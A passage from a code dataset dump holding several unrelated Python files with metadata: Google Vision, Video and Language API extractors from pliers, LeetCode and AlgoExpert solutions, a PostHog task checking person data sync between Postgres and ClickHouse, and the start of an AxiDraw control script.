(GoogleAPITransformer,\n GoogleVisionAPITransformer,\n GoogleAPITransformer)\nfrom pliers.extractors.base import ExtractorResult\nfrom pliers.utils import flatten_dict\n\n\nclass GoogleVisionAPIExtractor(GoogleVisionAPITransformer, ImageExtractor):\n\n ''' Base class for all Extractors that use the Google Vision API. '''\n\n VERSION = '1.0'\n\n def _extract(self, stims):\n request = self._build_request(stims)\n responses = self._query_api(request)\n\n results = []\n for i, response in enumerate(responses):\n if response and self.response_object in response:\n raw = response[self.response_object]\n results.append(ExtractorResult(raw, stims[i], self))\n elif 'error' in response:\n raise Exception(response['error']['message'])\n else:\n results.append(ExtractorResult([{}], stims[i], self))\n\n return results\n\n\nclass GoogleVisionAPIFaceExtractor(GoogleVisionAPIExtractor):\n\n ''' Identifies faces in images using the Google Cloud Vision API. '''\n\n request_type = 'FACE_DETECTION'\n response_object = 'faceAnnotations'\n\n def _to_df(self, result, handle_annotations=None):\n '''\n Converts a Google API Face JSON response into a Pandas Dataframe.\n\n Args:\n result (ExtractorResult): Result object from which to parse out a\n Dataframe.\n handle_annotations (str): How returned face annotations should be\n handled in cases where there are multiple faces.\n 'first' indicates to only use the first face JSON object, all\n other values will default to including every face.\n '''\n annotations = result._data\n if handle_annotations == 'first':\n annotations = [annotations[0]]\n\n face_results = []\n for i, annotation in enumerate(annotations):\n data_dict = {}\n for field, val in annotation.items():\n if 'Confidence' in field:\n data_dict['face_' + field] = val\n elif 'oundingPoly' in field:\n for j, vertex in enumerate(val['vertices']):\n for dim in ['x', 'y']:\n name = '%s_vertex%d_%s' % (field, j+1, dim)\n val = vertex[dim] if dim in vertex else np.nan\n data_dict[name] = val\n elif field == 'landmarks':\n for lm in val:\n if 'type' in lm:\n name = 'landmark_' + lm['type'] + '_%s'\n lm_pos = {name %\n k: v for (k, v) in lm['position'].items()}\n data_dict.update(lm_pos)\n else:\n data_dict[field] = val\n\n face_results.append(data_dict)\n\n return pd.DataFrame(face_results)\n\n\nclass GoogleVisionAPILabelExtractor(GoogleVisionAPIExtractor):\n\n ''' Labels objects in images using the Google Cloud Vision API. '''\n\n request_type = 'LABEL_DETECTION'\n response_object = 'labelAnnotations'\n\n def _to_df(self, result):\n res = {label['description']: label['score'] for label in result._data if label}\n return pd.DataFrame([res])\n\n\nclass GoogleVisionAPIPropertyExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts image properties using the Google Cloud Vision API. '''\n\n request_type = 'IMAGE_PROPERTIES'\n response_object = 'imagePropertiesAnnotation'\n\n def _to_df(self, result):\n colors = result._data['dominantColors']['colors']\n data_dict = {}\n for color in colors:\n rgb = color['color']\n key = [rgb.get('red', 0), rgb.get('green', 0), rgb.get('blue', 0)]\n key = ', '.join([str(v) for v in key])\n data_dict[key] = color['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVisionAPISafeSearchExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts safe search detection using the Google Cloud Vision API. '''\n\n request_type = 'SAFE_SEARCH_DETECTION'\n response_object = 'safeSearchAnnotation'\n\n def _to_df(self, result):\n return pd.DataFrame([result._data])\n\n\nclass GoogleVisionAPIWebEntitiesExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts web entities using the Google Cloud Vision API. '''\n\n request_type = 'WEB_DETECTION'\n response_object = 'webDetection'\n\n def _to_df(self, result):\n data_dict = {}\n if 'webEntities' in result._data:\n for entity in result._data['webEntities']:\n if 'description' in entity and 'score' in entity:\n data_dict[entity['description']] = entity['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVideoIntelligenceAPIExtractor(GoogleAPITransformer, VideoExtractor):\n\n ''' Extracts object features from videos using the Google Vision Video\n Intelligence API.\n\n Args:\n features (list): List of features to extract. LABEL_DETECTION extracts\n tags present throughout the provided segments (full video if none\n provided) as well as throughout the shots (depending on config).\n SHOT_CHANGE_DETECTION extracts a shot feature with onsets and\n durations corresponding to shot changes in the video.\n EXPLICIT_CONTENT_DETECTION extracts any frame onsets of explicit\n material.\n segments (list): List of JSON objects or dictionaries. Each dictionary\n should contain a startTimeOffset and an endTimeOffset field with\n timestamps of the format XX.XXs marking the desired segments upon\n which to extract features.\n config (dict): JSON object representing the desired configuration for\n extraction. See the Google Cloud Video Intelligence documentation\n for more details.\n timeout (int): Number of seconds to wait for video intelligence\n operation to finish. Defaults to 90 seconds.\n request_rate (int): Number of seconds to wait between polling the\n extraction operation for completion.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'videointelligence'\n _log_attributes = ('discovery_file', 'api_version', 'features', 'segments',\n 'config', 'timeout', 'request_rate')\n\n def __init__(self, features=['LABEL_DETECTION', 'SHOT_CHANGE_DETECTION',\n 'EXPLICIT_CONTENT_DETECTION'],\n segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.segments = segments\n self.config = config\n self.timeout = timeout\n self.request_rate = request_rate\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.videos().annotate(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _query_operations(self, name):\n if hasattr(self.service.operations(), 'get'):\n request_obj = self.service.operations().get(name=name)\n else:\n request_obj = self.service.projects().locations().\\\n operations().get(name=name)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n\n context = self.config if self.config else {}\n if self.segments:\n context['segments'] = self.segments\n\n with stim.get_filename() as filename:\n size = os.path.getsize(filename)\n LIMIT = 524288000\n if size > LIMIT:\n warnings.warn(\"Video file is very large ({} bytes) and may \"\n \"exceed the Google Video Intelligence payload \"\n \"limit ({} bytes).\".format(size, LIMIT))\n\n request = {\n 'inputContent': stim.get_bytestring(),\n 'features': self.features,\n 'videoContext': context\n }\n\n return request\n\n def _extract(self, stim):\n op_request = self._build_request(stim)\n operation = self._query_api(op_request)\n\n msg = \"Beginning video extraction with a timeout of %fs. Even for \"\\\n \"small videos, full extraction may take awhile.\" % self.timeout\n logging.warning(msg)\n\n operation_start = time.time()\n response = self._query_operations(operation['name'])\n while 'done' not in response and \\\n (time.time() - operation_start) < self.timeout:\n response = self._query_operations(operation['name'])\n time.sleep(self.request_rate)\n\n if (time.time() - operation_start) >= self.timeout:\n msg = \"The extraction reached the timeout limit of %fs, which \"\\\n \"means the API may not have finished analyzing the video \"\\\n \"and the results may be empty or incomplete.\" % self.timeout\n logging.warning(msg)\n\n return ExtractorResult(response, stim, self)\n\n def _get_onset_duration(self, timing_json):\n onset = float(timing_json['startTimeOffset'][:-1])\n end = float(timing_json['endTimeOffset'][:-1])\n return onset, (end - onset)\n\n def _parse_label(self, data, features, label):\n for segment in label.get('segments', []):\n onset, duration = self._get_onset_duration(segment['segment'])\n score = segment['confidence']\n data[(onset, duration)].update({f: score for f in features})\n\n def _parse_frame(self, data, features, annotation, score_key, max_time):\n frames = annotation.get('frames', [])\n for i, frame in enumerate(frames):\n onset = float(frame['timeOffset'][:-1])\n if (i + 1) == len(frames):\n end = max_time\n else:\n end = float(frames[i+1]['timeOffset'][:-1])\n duration = end - onset\n score = frame[score_key]\n data[(onset, duration)].update({f: score for f in features})\n\n def _to_df(self, result):\n response = result._data.get('response', {})\n data = defaultdict(dict)\n for r in response.get('annotationResults', []):\n for key, res in r.items():\n if 'Label' in key:\n for annot in res:\n feats = [annot['entity']['description']]\n for category in annot.get('categoryEntities', []):\n feats.append('category_' + category['description'])\n if key == 'frameLabelAnnotations':\n self._parse_frame(data, feats, annot, 'confidence',\n result.stim.duration)\n else:\n # Good for shot or segment labels\n self._parse_label(data, feats, annot)\n elif key == 'shotAnnotations':\n for i, shot in enumerate(res):\n onset, duration = self._get_onset_duration(shot)\n data[(onset, duration)].update({\n 'shot_id': i\n })\n elif key == 'explicitAnnotation':\n feature = 'pornographyLikelihood'\n self._parse_frame(data, [feature], res, feature,\n result.stim.duration)\n\n df = pd.DataFrame(list(data.values()))\n # If multiple confidences were parsed, uses the last one\n if len(data) > 0:\n onsets, durations = zip(*list(data.keys()))\n result._onsets = onsets\n result._durations = durations\n result.features = list(df.columns)\n return df\n\n\nclass GoogleVideoAPILabelDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts image labels using the Google Video Intelligence API '''\n\n def __init__(self, mode='SHOT_MODE', stationary_camera=False,\n segments=None, timeout=90, request_rate=5, num_retries=3,\n discovery_file=None, api_version='v1', max_results=100,\n rate_limit=None, frame_confidence_threshold=None,\n video_confidence_threshold=None):\n\n config = {\n 'labelDetectionConfig': {\n 'labelDetectionMode': mode,\n 'stationaryCamera': stationary_camera\n }\n }\n\n if frame_confidence_threshold is not None:\n if mode not in ['FRAME_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"frame_confidence_threshold can only be specified in\"\n \"FRAME or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['frameConfidenceThreshold'] = \\\n frame_confidence_threshold\n\n if video_confidence_threshold is not None:\n if mode not in ['SHOT_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"video_confidence_threshold can only be specified in\"\n \"SHOT or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['videoConfidenceThreshold'] = \\\n video_confidence_threshold\n\n super().__init__(features=['LABEL_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIShotDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts shot changes using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['SHOT_CHANGE_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIExplicitDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts explicit content using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['EXPLICIT_CONTENT_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIExtractor(GoogleAPITransformer, TextExtractor):\n\n ''' Extracts natural language features from text documents using the\n Google Natural Language API.\n\n Args:\n features (list): List of features (str) to extract. Available\n features: extractSyntax, extractEntities, extractDocumentSentiment,\n extractEntitySentiment, and classifyText. See Google Natural\n Language API documentation for more details.\n language (str): The ISO-639-1 or BCP-47 identifier for the document\n language. If None is provided, API auto-detects the language.\n is_html (bool): When True, the document's text is expected to be\n HTML. Otherwise, plain text is assumed.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'language'\n _log_attributes = ('discovery_file', 'api_version', 'features',\n 'language', 'is_html')\n\n def __init__(self, features=['extractSyntax',\n 'extractEntities',\n 'extractDocumentSentiment',\n 'extractEntitySentiment',\n 'classifyText'],\n language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.language = language\n self.is_html = is_html\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.documents().annotateText(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n document = {\n 'type' : 'HTML' if self.is_html else 'PLAIN_TEXT',\n 'content' : stim.text\n }\n\n if self.language:\n document['language'] = self.language\n\n request = {\n 'document': document,\n 'features': { f : True for f in self.features },\n 'encodingType': 'UTF32'\n }\n\n return request\n\n def _extract(self, stim):\n request = self._build_request(stim)\n response = self._query_api(request)\n return ExtractorResult(response, stim, self)\n\n def _get_span(self, text_json):\n offset = text_json['text']['beginOffset']\n content = text_json['text']['content']\n return { 'begin_char_index' : offset,\n 'end_char_index' : offset + len(content),\n 'text' : content }\n\n def _to_df(self, result):\n response = result._data\n data = []\n\n # One row/object for all document-level features\n document_data = {}\n\n if 'extractDocumentSentiment' in self.features:\n sentiment = response['documentSentiment']\n document_data.update(flatten_dict(sentiment, 'sentiment'))\n\n # Sentence level sentiment\n for sentence in response.get('sentences', []):\n sentence_data = self._get_span(sentence)\n sentiment = sentence['sentiment']\n sentence_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(sentence_data)\n\n for category in response.get('categories'):\n key = 'category_%s' % category['name']\n document_data[key] = category['confidence']\n\n # Include only if there are document-level features\n if document_data:\n data.append(document_data)\n\n # Entity-level features\n for entity in response.get('entities', []):\n entity_copy = entity.copy()\n mentions = entity_copy.pop('mentions', [])\n entity_copy.pop('name', None)\n entity_copy = flatten_dict(entity_copy)\n\n for m in mentions:\n entity_data = self._get_span(m)\n entity_data.update(entity_copy)\n # Overwrite top-level sentiment with mention-level\n sentiment = m.get('sentiment', {})\n entity_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(entity_data)\n\n # Token-level syntax features\n for token in response.get('tokens', []):\n token_data = self._get_span(token)\n token_data['lemma'] = token['lemma']\n token_data.update(token['partOfSpeech'])\n dependency = flatten_dict(token['dependencyEdge'], 'dependency')\n token_data.update(dependency)\n data.append(token_data)\n\n df = pd.DataFrame(data)\n df['language'] = response['language']\n return df\n\n\nclass GoogleLanguageAPIEntityExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts entity labels in text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntities'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractDocumentSentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISyntaxExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts syntax properties of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractSyntax'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPITextCategoryExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts document category using the Google Language API.\n See the API documentation for the taxonomy of categories:\n https://cloud.google.com/natural-language/docs/categories '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['classifyText'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIEntitySentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of entities found in text using the Google Language\n API. Produces identical results to the entity extractor but with additional\n sentiment analysis. '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntitySentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/api/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":26007,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"23915777194","text":"\"\"\"\nLeetcode #108 Convert Sorted Array to Binary Search Tree\n\nGiven an integer array nums where the elements are \nsorted in ascending order, convert it to a height-balanced \nbinary search tree.\n\nA height-balanced binary tree is a binary tree in which the \ndepth of the two subtrees of every node never differs by \nmore than one.\n\nExample 1:\nInput: nums = [-10,-3,0,5,9]\nOutput: [0,-3,9,-10,null,5]\nExplanation: [0,-10,5,null,-3,null,9] is also accepted:\n\nExample 2:\nInput: nums = [1,3]\nOutput: [3,1]\nExplanation: [1,null,3] and [3,1] are both height-balanced BSTs.\n\nConstraints:\n1 <= nums.length <= 104\n-104 <= nums[i] <= 104\nnums is sorted in a strictly increasing order.\n\nAlgorithm/DS used: Binary search using midpoint for creating a \nnode and stack for traversal\n\nO(N) worst case time where N is the length of nums\n\nO(N) worst case space where N is the length of nums\n\n\"\"\"\nfrom typing import List\nfrom typing import Tuple\nfrom collections import deque\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def _createNodeFromMidpoint(self, nums: List[int]) -> Tuple[TreeNode, List, List]:\n if not nums:\n return (None, [], [])\n m = len(nums) // 2\n return (TreeNode(val=nums[m]), nums[:m], nums[m+1:])\n\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n m = len(nums) // 2\n root = TreeNode(val=nums[m])\n s = [(root, nums[:m], nums[m+1:])]\n while s:\n current = s.pop()\n left = self._createNodeFromMidpoint(current[1])\n right = self._createNodeFromMidpoint(current[2])\n current[0].left = left[0]\n current[0].right = right[0]\n if left[0]:\n s.append(left)\n if right[0]:\n s.append(right)\n return root\n\n\ndef breadth_first_traverse(root: TreeNode) -> List:\n result = []\n q = deque()\n q.append(root)\n while q:\n current = q.popleft()\n if not current:\n result.append(current)\n elif current:\n result.append(current.val)\n if current.left or current.right:\n q.append(current.left)\n q.append(current.right)\n return result\n\n\ndef test_solution():\n s = Solution()\n print(\"Expected result from input [-10,-3,0,5,9] is [0,-3,9,-10,None,5, None] and the Actual result is: \" +\n str(breadth_first_traverse(s.sortedArrayToBST([-10, -3, 0, 5, 9]))))\n assert breadth_first_traverse(s.sortedArrayToBST(\n [-10, -3, 0, 5, 9])) == [0, -3, 9, -10, None, 5, None]\n assert breadth_first_traverse(s.sortedArrayToBST(\n [1, 3])) == [3, 1, None]\n\n # Insert more tests here...\n\n\nif __name__ == \"__main__\":\n test_solution()\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"leetcode/python3/convert_sorted_array_to_binary_search_tree.py","file_name":"convert_sorted_array_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33280821155","text":"# O(n) time | O(1) space - where n is the length of the input ar\r\n\r\ndef hasSingleCycle(array):\r\n\tnumElementsVisited = 0\r\n\tcurrentIdx = 0\r\n\twhile numElementsVisited < len(array):\r\n\t\tif numElementsVisited > 0 and currentIdx == 0:\r\n\t\t\treturn False\r\n\t\tnumElementsVisited += 1\r\n\t\tcurrentIdx = getNextIdx(currentIdx, array)\r\n\treturn currentIdx == 0\r\n\r\ndef getNextIdx(currentIdx, array):\r\n\tjump = array[currentIdx]\r\n\tnextIdx = (currentIdx + jump) % len(array)\r\n\treturn nextIdx if nextIdx >= 0 else nextIdx + len(array)","repo_name":"Abhishek-Rout/Competitive-Coding","sub_path":"AlgoExpert/2. Medium/Python/Single Cycle Check/Single Cycle Check.py","file_name":"Single Cycle Check.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"39513457049","text":"import json\nfrom collections import Counter, defaultdict\nfrom datetime import timedelta\nfrom typing import Any, Dict, List\n\nimport structlog\nfrom django.db.models.query import Prefetch\nfrom django.utils.timezone import now\n\nfrom posthog.celery import app\nfrom posthog.client import sync_execute\nfrom posthog.models.person import Person\n\nlogger = structlog.get_logger(__name__)\n\n# We check up to LIMIT persons between PERIOD_START..PERIOD_END, in batches of BATCH_SIZE\n# This helps keep the metric \"moving\" as we ship fixes or bugs.\nLIMIT = 100000\nBATCH_SIZE = 500\nPERIOD_START = timedelta(hours=1)\nPERIOD_END = timedelta(days=2)\n\nGET_PERSON_CH_QUERY = \"\"\"\nSELECT id, version, properties FROM person JOIN (\n SELECT id, max(version) as version, max(is_deleted) as is_deleted, team_id\n FROM person\n WHERE team_id IN %(team_ids)s AND id IN (%(person_ids)s)\n GROUP BY team_id, id\n) as person_max ON person.id = person_max.id AND person.version = person_max.version AND person.team_id = person_max.team_id\nWHERE team_id IN %(team_ids)s\n AND person_max.is_deleted = 0\n AND id IN (%(person_ids)s)\n\"\"\"\n\nGET_DISTINCT_IDS_CH_QUERY = \"\"\"\nSELECT distinct_id, argMax(person_id, version) as person_id\nFROM person_distinct_id2\nWHERE team_id IN %(team_ids)s\nGROUP BY team_id, distinct_id\nHAVING argMax(is_deleted, version) = 0 AND person_id IN (%(person_ids)s)\n\"\"\"\n\n\n@app.task(max_retries=1, ignore_result=True)\ndef verify_persons_data_in_sync(\n period_start: timedelta = PERIOD_START,\n period_end: timedelta = PERIOD_END,\n limit: int = LIMIT,\n emit_results: bool = True,\n) -> Counter:\n # :KLUDGE: Rather than filter on created_at directly which is unindexed, we look up the latest value in 'id' column\n # and leverage that to narrow down filtering in an index-efficient way\n max_pk = Person.objects.filter(created_at__lte=now() - period_start).latest(\"id\").id\n person_data = list(\n Person.objects.filter(\n pk__lte=max_pk,\n pk__gte=max_pk - LIMIT * 5,\n created_at__gte=now() - period_end,\n ).values_list(\"id\", \"uuid\", \"team_id\")[:limit]\n )\n person_data.sort(key=lambda row: row[2]) # keep persons from same team together\n\n results = Counter(\n {\n \"total\": 0,\n \"missing_in_clickhouse\": 0,\n \"version_mismatch\": 0,\n \"properties_mismatch\": 0,\n \"distinct_ids_mismatch\": 0,\n \"properties_mismatch_same_version\": 0,\n }\n )\n for i in range(0, len(person_data), BATCH_SIZE):\n batch = person_data[i : i + BATCH_SIZE]\n results += _team_integrity_statistics(batch)\n\n if emit_results:\n _emit_metrics(results)\n\n return results\n\n\ndef _team_integrity_statistics(person_data: List[Any]) -> Counter:\n person_ids = [id for id, _, _ in person_data]\n person_uuids = [uuid for _, uuid, _ in person_data]\n team_ids = list(set(team_id for _, _, team_id in person_data))\n\n # :TRICKY: To speed up processing, we fetch all models in batch at once and store results in dictionary indexed by person uuid\n pg_persons = _index_by(\n list(\n Person.objects.filter(id__in=person_ids).prefetch_related(\n Prefetch(\"persondistinctid_set\", to_attr=\"distinct_ids_cache\")\n )\n ),\n lambda p: p.uuid,\n )\n\n ch_persons = _index_by(\n sync_execute(GET_PERSON_CH_QUERY, {\"person_ids\": person_uuids, \"team_ids\": team_ids}),\n lambda row: row[0],\n )\n\n ch_distinct_ids_mapping = _index_by(\n sync_execute(\n GET_DISTINCT_IDS_CH_QUERY,\n {\"person_ids\": person_uuids, \"team_ids\": team_ids},\n ),\n lambda row: row[1],\n flat=False,\n )\n\n result: Counter = Counter()\n for _pk, uuid, team_id in person_data:\n # Person was deleted in the middle of processing, can ignore\n if uuid not in pg_persons:\n continue\n result[\"total\"] += 1\n pg_person = pg_persons[uuid]\n if uuid not in ch_persons:\n result[\"missing_in_clickhouse\"] += 1\n logger.info(\"Found person missing in clickhouse\", team_id=team_id, uuid=uuid)\n continue\n _, ch_version, ch_properties = ch_persons[uuid]\n ch_properties = json.loads(ch_properties)\n if ch_version != pg_person.version:\n result[\"version_mismatch\"] += 1\n logger.info(\n \"Found version mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n if pg_person.properties != ch_properties:\n result[\"properties_mismatch\"] += 1\n logger.info(\n \"Found properties mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n\n # :KLUDGE: Verify business logic. If versions are in sync so should properties be.\n if ch_version != 0 and ch_version == pg_person.version and pg_person.properties != ch_properties:\n result[\"properties_mismatch_same_version\"] += 1\n\n pg_distinct_ids = list(sorted(map(str, pg_person.distinct_ids)))\n ch_distinct_id = list(sorted(str(distinct_id) for distinct_id, _ in ch_distinct_ids_mapping.get(uuid, [])))\n if pg_distinct_ids != ch_distinct_id:\n result[\"distinct_ids_mismatch\"] += 1\n return result\n\n\ndef _emit_metrics(integrity_results: Counter) -> None:\n from statshog.defaults.django import statsd\n\n for key, value in integrity_results.items():\n statsd.gauge(f\"posthog_person_integrity_{key}\", value)\n\n\ndef _index_by(collection: List[Any], key_fn: Any, flat: bool = True) -> Dict:\n result: Dict = {} if flat else defaultdict(list)\n for item in collection:\n if flat:\n result[key_fn(item)] = item\n else:\n result[key_fn(item)].append(item)\n return result\n","repo_name":"PostHog/posthog","sub_path":"posthog/tasks/verify_persons_data_in_sync.py","file_name":"verify_persons_data_in_sync.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"70506573929","text":"# Created by \"EdgardoCS\" at 22-Aug-23\n__github__ = \"https://github.com/EdgardoCS\"\n__email__ = \"edgardo.silva@uv.cl\"\n\nimport os\nimport sys\nimport time\nimport queue\nimport random\nimport traceback\nimport threading\nimport screeninfo\nimport numpy as np\nimport pandas as pd\nfrom axidraw import brush\n\nfrom PyQt6.QtCore import *\nfrom PyQt6 import QtWidgets\nfrom PyQt6.uic import loadUi\nfrom PyQt6.QtGui import QScreen\nfrom PyQt6.QtWidgets import QMainWindow, QApplication, QInputDialog, QFileDialog, QWidget\n\n\nclass WorkerSignals(QObject):\n \"\"\"\n Defines the signals available from a running worker thread.\n Supported signals are:\n finished\n No data\n error\n tuple (exctype, value, traceback.format_exc() )\n result\n object data returned from processing, anything\n progress\n int indicating % progress\n \"\"\"\n finished = pyqtSignal()\n error = pyqtSignal(tuple)\n result = pyqtSignal(object)\n progress = pyqtSignal(int)\n\n\nclass vasWorker(QRunnable):\n def __init__(self, fn, *args, **kwargs):\n super(vasWorker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass Worker(QRunnable):\n \"\"\"\n Worker thread\n Inherits from QRunnable to handler worker thread setup, signals and wrap-up.\n\n :param callback: The function callback to run on this worker thread. Supplied args and\n kwargs will be passed through to the runner.\n :type callback: function\n :param args: Arguments to pass to the callback function\n :param kwargs: Keywords to pass to the callback function\n \"\"\"\n\n def __init__(self, fn, *args, **kwargs):\n super(Worker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n # Retrieve args/kwargs here; and fire processing using them\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass AxiDraw(threading.Thread):\n \"\"\"\n AxiDraw main thread\n Set of functions to communicate with axidraw device, can manipulate port (open, close) and send\n signals to initialize movement(move_x, move_y, pen_up, pen_down.\n \"\"\"\n\n def __init__(self, q_in, q_out):\n threading.Thread.__init__(self)\n self.serial_port = None\n self.running = True\n self.serial_status = False\n self.running = True\n self.q_in = q_in\n self.q_out = q_out\n\n def stop(self):\n self.running = False\n # Here we need to close the serial port!\n print('Axidraw thread stopped')\n\n def run(self):\n while self.running:\n msg = self.q_in.get()\n if msg == 'open_port':\n port = brush.findPort() # Success!! Axidraw founded in COMPort\n if port:\n self.serial_port, self.serial_status = brush.openPort(port)\n if self.serial_port:\n if self.serial_status:\n self.q_out.put(self.serial_port.name, self.serial_status)\n # return self.serial_port.name\n else:\n self.q_out.put(self.serial_port.name)\n # return self.serial_port.name\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n\n if msg == 